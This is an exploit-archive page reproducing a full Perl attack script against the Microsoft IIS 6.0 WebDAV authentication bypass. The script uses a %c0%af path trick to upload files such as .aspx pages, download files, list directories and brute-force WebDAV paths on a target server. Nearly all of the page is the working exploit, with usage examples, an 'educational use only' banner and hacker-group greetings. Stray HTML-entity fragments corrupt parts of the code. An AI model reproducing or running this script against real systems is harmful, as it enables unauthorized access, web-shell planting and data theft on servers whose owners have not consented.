Advertisement




Edit Report

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010090121

Below is a copy:

======================================
MS IIS 6.0 WebDAV Auth. Bypass Exploit
======================================

# Author : FoX HaCkEr

#Contact : [email protected]

# SiTe : www.sec4ever.com

======================================================================================================
#!/usr/bin/perl
#  ********* !!! WARNING !!! *********
#  *   FOR SECURITY TESTiNG ONLY!    *
#  ***********************************
#  MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1
#  v1.1 add brute force dir fuction.
#  v1.0 download?upload and list dir.
#
#  Usage:
#        IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file]
#        -target                &nbs p;               eg.: 192.168.1.1
#   -port                                    eg.: 80
#   -method                                eg.: g
#    (p:PUT,g:GET,l:LIST)
#   -webdavpath                        eg.: webdav
#   -BruteForcePath                eg.: brute force webdav path
#   -file    (optional)            eg.: test.aspx
#  Example:
#        put a file:
#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx
#        get a file:
#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx
#        list dir:
#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav
#        brute force + list dir:
#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt
#        brute force + get file:
#                IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx
 
use IO::Socket;use Getopt::Long;

use threads;
use threads::shared;

# Globals Go Here.
my $target;                # Host being probed.
my $port;                    # Webserver port.
my $method;                # HTTP Method, PUT GET or .
my $xpath;                # WebDAV path on Webserver.
my $bpath;                # Bruteforce WebDAV path.
my $file;                    # file name.
my $httpmethod;
my $Host_Header;    # The Host header has to be changed

GetOptions(
        "target=s"     ;  => \$target,
        "port=i"        => \$port,
        "method=s"      => \$method,
        "xpath=s"       => \$xpath,
        "bpath=s"       => \$bpath,
        "file=s"        => \$file,
        "help|?"        => sub {
                                hello();
                                 exit(0);
                           }
);

$error .= "Error: You must specify a target host\n" if ((!$target));
$error .= "Error: You must specify a target port\n" if ((!$port));
$error .= "Error: You must specify a put,get or list method\n" if ((!$method));
$error .= "Error: You must specify a webdav path\n" if ((!$xpath) && (!$bpath));
$error .= "Error: You must specify a upload or download file name\n" if ((!$file) && $method != "l");

if ($error) {
        print "Try $0 -help or -?' for more information.\n$error\n" ;
        exit;
}

hello();

if ($method eq "p") {
    $httpmethod = "PUT";
} elsif ($method eq "g") {
  $httpmethod = "GET";
} elsif ($method eq "l") {
  $httpmethod = "PROPFIND";
} else {
  print "$method Method not accept !!!\n";
  exit(0);
}
    
# ************************************
# * We testing WebDAV methods first  *
# ************************************
webdavtest($target,$port);
#end of WebDAV testing.
# ****************************************
# * We try to brute forceing WebDAV path *
# ****************************************
if ($bpath) {
  $xpath = webdavbf($target,$port,$bpath);
}
#end of brute force
print "-" x 60 ."\n";
if ($httpmethod eq "PUT") {
  my $content;
  my $data;
  #cacl file size
  $filesize = -s $file;
  print "$file size is $filesize bytes\n";
  open(INFO, $file) || die("Could not open file!");
  #@lines=<INFO>;
  binmode(INFO); #binary
  while( read(INFO, $data, $filesize))
  {
      $content .= $data;
  }
  close(INFO);
  #print $content;
 
  $Host_Header = "Translate: f\r\nHost: $target\r\nContent-Length: $filesize\r\n";
} elsif ($httpmethod eq "GET") {
    $Host_Header = "Translate: f\r\nHost: $target\r\nConnection: close\r\n\r\n";
} elsif ($httpmethod eq "PROPFIND") {
    $Host_Header = "Host: $target\r\nConnection: close\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n";
    $Host_Header = $Host_Header."<?xml version=\"1.0\" encoding=\"utf-8\"?><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://apache.org/dav/props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>";
}
print "-" x 60 ."\n$httpmethod $file , Please wait ...\n"."-" x 60 ."\n";

# ******************** ****
# * Sending HTTP request *
# ************************
if ($httpmethod eq "PUT") {
  @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header\r\n$content",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $port\n";}
} elsif ($httpmethod eq "GET") {
    @results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $port\n";}
} elsif ($httpmethod eq "PROPFIND") {
    @results=sendraw2("$httpmethod /%c0%af$xpath/ HTTP/1.0\r\n$Host_Header",$target,$port,10);
  if ($#results < 1){die "10s timeout to $target on port $port\n";}
}
#print @results;
$flag="off";
if ($results[0] =~ m|^HTTP/1\.[01] 2[0-9][0-9] |){
    $flag="on";
} elsif ($results[0] =~ m|^HTTP/1\.[01] 4[0-9][0-9] |){
    $flag="off";
}&nb sp;   

print "-" x 60 ."\n";
if ($flag eq "on") {
  if ($httpmethod eq "PUT") {
      print "$httpmethod $file from [$target:$port/$xpath] OK\r\n";
  } elsif ($httpmethod eq "GET") {
    my $line_no = 0;
    my $counter = @results;
    foreach $line (@results){
        ++$line_no;
        if ($line =~ /^Accept-Ranges: bytes\r\n/){
            last;
        }
    }

    # Write file to disk
    open(OUTFILE, ">$file") or die "Could not write to file: $!\n";
    binmode (OUTFILE);
    print OUTFILE @results[$line_no+1..$counter];
    close(OUTFILE);    
     
       print "$httpmethod $file from [$target:$port/$xpath] OK\r\nPlease check $file on local disk\r\n";      
      
  } elsif ($httpmethod eq "PROPFIND") {
    print "$httpmethod path list from [$target:$port/$xpath] OK\r\n";
      foreach $line (@results){
        if ($line =~ /^\<\?xml version\=/i){
            my @list = split("<a:href>", $line);
            foreach $path (@list) {
                $no = index($path,"<");
                $result.=substr($path, 0, $no)."\n";
            }
            print $result;
         ;    last;
        }
    }
  }
} else {
    print "$httpmethod $file from [$target:$port/$xpath] FAILED!!!\r\n";
}
print "-" x 60 ."\n";
exit(0);

# *************
# * Sendraw-2 *
# *************
sub sendraw2 {
  my ($pstr,$realip,$realport,$timeout)[email protected]_;
  my $target2 = inet_aton($realip);
  my $flagexit=0;
  $SIG{ALRM}=\&ermm;
  socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems");
  alarm($timeout);
  if (connect(S,pack "SnA4x8",2,$realport,$target2)){
    alarm(0);
    my @in;
    select(S); $|=1;
    print $pstr;
    alarm($timeout);
    while(<S>){
      if ($flagexit == 1){
        close (S);
        print STDOUT "Timeout\n";
        return "Timeout";
      }
      push @in, $_;
    }
    alarm(0);
    select(STDOUT);
    close(S);
    return @in;
  } else {return "0";}
}

sub ermm{
        $flagexit=1;
        close (S);
}

sub webdavtest {
    my ($testip,$testport)[email protected]_;
  print "-" x 60 ."\n";
  print "Testing WebDAV methods [$testip $testport]\n";
  print "-" x 60 ."\n";
  @results=sendraw2("OPTIONS / HTTP/1.0\r\n\r\n",$testip,$testport,10);
  if ($#results < 1){die "10s timeout to $target on port $testport\n";}
  #print @results;
  $flag="off";
  foreach $line (@results){
      if ($line =~ /^Server: /){
          ($left,$right)=split(/\:/,$line);
          $right =~ s/ //g;
          print "$target : Server type is : $right";

        if ($right !~ /Microsoft-IIS/i){
            print "$target : Not a Microsoft IIS Server\n";
            exit(0);
        }
      }
    
      if ($line =~ /^DAV: /){
          $flag="on";
      }
    
      if ($line =~ /^Public: / && $flag eq "on"){
        ($left,$right)=split(/\:/,$line);
&n bsp;       $right =~ s/ //g;
        print "$target : Method type is : $right";
        if ($right !~ /$httpmethod/i){
          print "$target : Not allow $httpmethod on this WebDAV Server\n";
          exit(0);
        } else {
          $flag="on";
        }
      }        
  }
  if ($flag eq "off") {
    print "$target : WebDAV disable\n";
    exit(0);    
  }
}

sub webdavbf {
    my ($bfip,$bfport,$bfpath)[email protected]_;
  print "-" x 60 ."\n";
  print "Try to brute forceing WebDAV path ...\n";
  print "-" x 60 ."\n";
& nbsp; open(BF, $bfpath) || die("Could not open file!");
  foreach $lines (<BF>){
      chomp($lines);

      $Host_Header = "Host: $bfip\r\nConnection: close\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n";
      $Host_Header = $Host_Header."<?xml version=\"1.0\" encoding=\"utf-8\"?><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://apache.org/dav/props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>";
      
      @results=sendraw2("PROPFIND /$lines/ HTTP/1.0\r\n$Host_Header",$bfip,$bfport,10);
    if ($#results < 1){die "10s timeout to $bfip on port $bfport\n";}
    
    print "[$lines]...$results[0]";
    
       #maybe this response< br>       #HTTP/1.1 207 Multi-Status
    if ($results[0] =~ m|^HTTP/1\.[01] 401 |){
        print "Find out path on [$lines]\n";
        return $lines;
        last;
    }
  }
  close(BF) ;
  print "Sorry... We can not find any more path... :(\n";
  exit(0);
}

sub hello{
  print "\n";
  print "\t ##################################################\n";
  print "\t #    MS IIS 6.0 WebDAV Auth. Bypass Exploit V1.0  #\n";
  print "\t #  **************** !!! WARNING !!! **************#\n";
  print "\t #  **** FOR PRIV8 AND EDUCATIONAL USE ONLY! ****#\n";
  print "\t #  ***********************************************#\n";
  print "\t #  Written by csgcsg 090529     ;                   #\n";
  print "\t ###################################################\n";
  print "\n\t $0 -target -port -method -webdavpath [-file]\n";
  print "\n\t -target\t\t eg.: 192.168.1.1\n";
  print "\t -port\t\t\t eg.: 80\n";
  print "\t -method (p:PUT, g:GET, l:LIST)\t eg.: g\n";
  print "\t -webdavpath|-bruteForcePath\t\t eg.: webdav\n";
  print "\t -file\t\t\t eg.: test.aspx\n\n";
  print "\tUsage eg.: \n\t$0 -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx\n";
};
=======================================================================================================

Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & Black Cobra & KinG oF CnTroL & MadjiX & Ma3sTr0-Dz
Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in  MsN & ALL Members p0c team &


Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.